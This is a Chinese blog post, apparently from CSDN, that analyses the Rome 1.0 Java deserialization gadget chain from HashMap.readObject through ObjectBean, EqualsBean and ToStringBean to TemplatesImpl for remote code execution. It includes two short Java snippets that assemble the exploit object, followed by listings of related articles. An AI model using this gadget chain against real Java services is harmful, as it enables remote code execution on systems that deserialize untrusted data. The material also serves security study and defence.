Javaweb安全——反序列化漏洞-Rome

rome反序列化漏洞解析
原创 已于 2023-02-03 23:15:18 修改 · 492 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

于 2023-01-30 22:27:33 首次发布
本文分析了rome库中的反序列化漏洞,该漏洞利用ToStringBean类遍历并反射调用封装类的所有无参getter方法。通过构造恶意的TemplatesImpl对象,并结合HashMap反序列化触发hashCode()调用,实现远程代码执行。

反序列化漏洞-rome

核心是 ToStringBean#toString()会调用其封装类的所有无参getter方法

依赖

<dependency>
    <groupId>rome</groupId>
    <artifactId>rome</artifactId>
    <version>1.0</version>
</dependency>

调用链分析

TemplatesImpl.getOutputProperties()
Method.invoke(Object, Object...)
ToStringBean.toString(String)
ToStringBean.toString()
ObjectBean.toString()
EqualsBean.beanHashCode()
ObjectBean.hashCode()

HashMap<K,V>.hash(Object)
HashMap<K,V>.readObject(ObjectInputStream)

可见关键部分在ToStringBean.toString(String),这里会遍历prefix的所有属性的无参 getter 方法,并进行反射调用。

image-20230130012609276

上面的调用也没啥好说的

com.sun.syndication.feed.impl.ToStringBean#toString()

image-20230130012836947

com.sun.syndication.feed.impl.ObjectBean#toString

image-20230130012754630

com.sun.syndication.feed.impl.EqualsBean#beanHashCode

image-20230130012733277

com.sun.syndication.feed.impl.ObjectBean#hashCode

image-20230130012657216

hashCode()的调用在之前CC链中很熟悉了,通过HashMap反序列化触发即可。

主要是看下com.sun.syndication.feed.impl.ObjectBean#ObjectBean(java.lang.Class, java.lang.Object)构造方法。

初始化时提供了一个 Class 类型和一个 Object 对象实例进行封装。其成员变量 EqualsBean/ToStringBean 类,分别为其提供了 equalshashCode / toString方法。

image-20230130013156899

exp

写起来也很简单,直接套两层ObjectBean即可

//获取恶意TemplatesImpl对象
TemplatesImpl obj = SerializeUtil.generateTemplatesImpl();

ObjectBean innerObjectBean = new ObjectBean(Templates.class,obj);
ObjectBean extObjectBean = new ObjectBean(ObjectBean.class,innerObjectBean);

Map expMap = new HashMap();
expMap.put(extObjectBean, "test");

不过这样写会有触发两次且有点臃肿,可以直接通过反射设置里面的类属性。

即通过反射设置EqualsBean#_objToStringBean,直接去调用ToStringBean#toString()去掉了中间的ObjectBean#toString

TemplatesImpl obj = SerializeUtil.generateTemplatesImpl();

ToStringBean toStringBean = new ToStringBean(Templates.class, obj);
EqualsBean equalsBean = new EqualsBean(ToStringBean.class, toStringBean);
ObjectBean extObjectBean = new ObjectBean(String.class,"test");

Map expMap = new HashMap();
expMap.put(extObjectBean, "test");
SerializeUtil.setFieldValue(extObjectBean,"_equalsBean",equalsBean);
Java 反序列化漏洞:如何避免和修复
shrgegrb的博客
03-17 1103
Java反序列化漏洞是一种严重的安全漏洞,主要出现在Java应用程序中。它发生在将字节流转换回对象的反序列化过程中。如果反序列化过程中没有进行有效的安全检查,攻击者可以构造恶意对象,导致任意代码执行、服务器崩溃或其他安全问题。反序列化漏洞的产生主要是因为Java的序列化和反序列化机制本身没有内置的安全性检查。攻击者可以构造一个恶意的序列化对象,当这个对象被反序列化时,就会触发漏洞,执行攻击者想要的操作。
关于php----phar伪协议和phar文件反序列化漏洞利用
m0_62107966的博客
09-12 2535
关于php----phar伪协议和phar文件反序列化漏洞利用phar(php archive)含义为php 归档文件。如果一个由多个文件构成的php应用程序,可以合并打包为一个文件夹,类似于javaweb项目里的jar文件的话,对于程序员来说是很方便的。在PHP5.3之后支持了类似Java的jar包,名为phar。用来将多个PHP文件打包为一个文件。要生成phar文件的话也是很方便,不需要借助额外的工具来创建或者使用,通过php脚本运行就自动在该脚本所在目录下自动创建。
ROME 反序列化
2301_79700060的博客
07-11 868
ROME是主要用于解析RSS和Atom种子的一个Java框架。ROME 是一个可以兼容多种格式的 feeds 解析器,可以从一种格式转换成另一种格式,也可返回指定格式或 Java 对象。ROME 兼容了 RSS (0.90, 0.91, 0.92, 0.93, 0.94, 1.0, 2.0), Atom 0.3 以及 Atom 1.0 feeds 格式。他有个特殊的位置就是ROME提供了ToStringBean这个类,提供深入的toString方法对Java Bean进行操作。
[Java反序列化]—Rome反序列化
Sentiment的博客
04-28 701
ROME可能是目前最完善的开源聚合工具,ROME支持绝大多数的RSS协议。
Rome反序列化
01-22 787
Rome反序列化 Gadget /* * Gadget: * HashMap#readObject * ObjectBean#hashCode * EqualsBean#beanHashCode * ToStringBean#toString * TemplatesImpl#getOutputProperties * */ HashMap#readObject 可以调用到任意一个类的 hashCode 方法,这里调用到的是 Obje
ROME反序列化-TemplatesImpl链子
chenxiaoyinaida的博客
11-10 500
前言: ROME 是一个可以兼容多种格式的 feeds 解析器,可以从一种格式转换成另一种格式,也可返回指定格式或 Java 对象。 正题: 这个链子是通过HashMap调用ObjectBean的hashCode()方法来完成RCE。 这里放一下链子会用到的一些必要代码,接下来进行相应的调试 public int hashCode() { return this._equalsBean.beanHashCode(); } 当调用hashCode之后会调用beanHashCode(),..
[Java反序列化]rome反序列化学习
feng的博客
11-09 1471
前言 也算是忙里偷闲了,看了一下午的操作系统感觉自己就是傻子。。。晚上把前段时间的战疫比赛遇到的rome反序列化链给学习了一下,之后应该还是继续课内的学习,除了打打比赛,其他的学习得等到寒假了。 分析 从网上找了利用链: TemplatesImpl.getOutputProperties() NativeMethodAccessorImpl.invoke0(Method, Object, Object[]) NativeMethodAccessorImpl.invoke(Object, Object[])
Web安全--反序列化漏洞(java篇)
bobo_milk的博客
11-29 3518
java反序列化参考
Bolvvv-javaweb-front-and-back-15124-1755667914516.zip
最新发布
08-29
文件标题中的“Bolvvv-javaweb-front-and-back-15124-1755667914516.zip”暗示了项目可能与编号“15124”有关,时间戳“1755667914516”则可能是项目创建或打包的时间。描述中的“Bolvvv_javaweb_front_and_back_...
javaweb基于SpringBoot宠物店管理系统-毕业设计-源代码+初始化数据库
01-04
javaweb基于SpringBoot宠物店管理系统-毕业设计-源代码+初始化数据库 javaweb基于SpringBoot宠物店管理系统-毕业设计-源代码+初始化数据库 javaweb基于SpringBoot宠物店管理系统-毕业设计-源代码+初始化数据库 ...
『Java安全反序列化-Rome 1.0反序列化POP链分析_ysoserial Rome payload分析
Ho1aAs‘s Blog
03-08 2241
文章目录前言版本代码审计 | 原理分析1. ToStringBean.toString()触发TemplatesImpl.getOutputProperties()手动调用ToStringBean.toString()示例代码2. EqualsBean.hashCode()触发toString()手动调用EqualsBean.hashCode()示例代码3. ObjectBean触发toString()或hashCode()手动调用ObjectBean.toString()和hashCode()示例代码4.
Web】浅聊Java反序列化Rome——EqualsBean&ObjectBean
uuzeray的博客
03-09 1255
ROME 是一个可以兼容多种格式的 feeds 解析器,可以从一种格式转换成另一种格式,也可返回指定格式或 Java 对象。ROME 兼容了 RSS (0.90, 0.91, 0.92, 0.93, 0.94, 1.0, 2.0), Atom 0.3 以及 Atom 1.0 feeds 格式。Rome 提供了这个类,提供深入的 toString 方法对JavaBean进行操作,这也是问我们用Rome反序列化的核心利用点。
序列化和反序列化案例
weixin_40964170的博客
05-02 274
序列化:将java对象转化为可传输的字节数组 反序列化:将字节数组还原为java对象 为啥子要序列化? 序列化最终的目的是为了对象可以跨平台存储,和进行网络传输。而我们进行跨平台存储和网络传输的方式就是IO,而我们的IO支持的数据格式就是字节数组 什么情况下需要序列化? 凡是需要进行跨平台存储和网络传输的数据,都需要进行序列化 本质上存储和网络传输 都需要经过 把一个对象状态保存成一种跨平台识别的字节格式,然后其他的平台才可以通过字节信息解析还原对象信息 序列化的方式 序列化只是一种拆装组装对象的规则,这种
华为ROMA平台遇到的常见问题汇总
空城的博客
03-24 1519
写完roma自定义后端,在自定义后端模块直接可以测试、发布、部署等操作,在这个界面点测试的时候要注意,可能我们自定义代码里有循环调用某些接口的逻辑,时间很容易超过15s,如果超过15s,就会返回timeout的错误,因此,如果报错了,可以去API管理模块进行调试,如果返回的数据集较大,后面的数据会被截断。roma的任务管理模块和自定义后端模块,如果是很多人协同开发的话,所有的任务都会显示,如果想查看只有自己开发的任务,是没有这个模块的,希望后面华为优化下吧。
“Roma225”网络间谍活动:利用RevengeRAT瞄准意大利汽车行业
mozhe_的博客
01-02 1981
最近,Cybaze-Yoroi ZLab的研究人员对一款针对意大利汽车行业的间谍恶意软件进行了分析。该恶意软件是通过钓鱼电子邮件传播的,攻击者试图伪装成巴西一家知名商业律师事务所的高级合伙人——Veirano Advogados。 恶意电子邮件的附件是一个PowerPoint外接程序文件(.ppa文件),包含能够自动运行的VBA宏代码。 图1.ppa文件打开时显示的弹出窗口 技术分析 ...
Web】浅聊Hessian反序列化之打Rome出网&不出网
uuzeray的博客
03-12 1392
正如我们前文所说,当Hessian反序列化Map类型的对象的时候,会自动调用其put方法,而put方法又会牵引出各种相关利用链打法。map.put对于HashMap会触发key.hashCode()。利用到hashCode的链子有很多,如CC6和Rome相关链,但很遗憾的是CC6因为一些原因无法使用,后面会出一篇文章专门讲其原因。本文主要讲一下Rome出网和不出网的两种利用方式。
Web】浅聊Java反序列化Rome——关于其他利用链
uuzeray的博客
03-09 1532
Rome中ToStringBean的利用和jdk7u21原生反序列化真的很神似,下面不少链子应该也能拿jdk7u21原生来改,感兴趣的师傅可以尝试一下。【Web】Java原生反序列化之jdk7u21——又见动态代理-优快云博客。
[JAVA安全]ROME链复现与分析
qq_42585535的博客
10-12 283
而在初步构造gadget时,我们先入为主地把。这里的ysoserial.Pwner类是yso在生成ROME链的generate payload时注入的恶意字节码,类似于我们自己写的Evil.class。经过了一段时间(折磨了1天)的代码阅读与大量的调试与修改,我把一些没有什么意义的代码精简后,实现了ysoserial payload的动态加载的效果。注意这里的key是ObjectBean@919,在之后反推和构造Gadgat时要用到,后续还会嵌套在其他对象里面,用IDEA给的编号确定对象位置。
Java反序列化漏洞-ROME利用链分析
l11III1111的博客
12-04 3618
直接看到执行getOutputProperties的方法 调用了BeanIntrospector.getPropertyDescriptors(_beanClass)获取_beanClass中的所有的getter和setter方法。其中_beanClass是我们在ObjectBean中传入的一个class类型的对象 具体获取getter和setter方法在getPDs的另一个重载了的方法里面 而我们知道TemplatesImpl的getOutputProperties前面是以get开头的满足这个格式,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值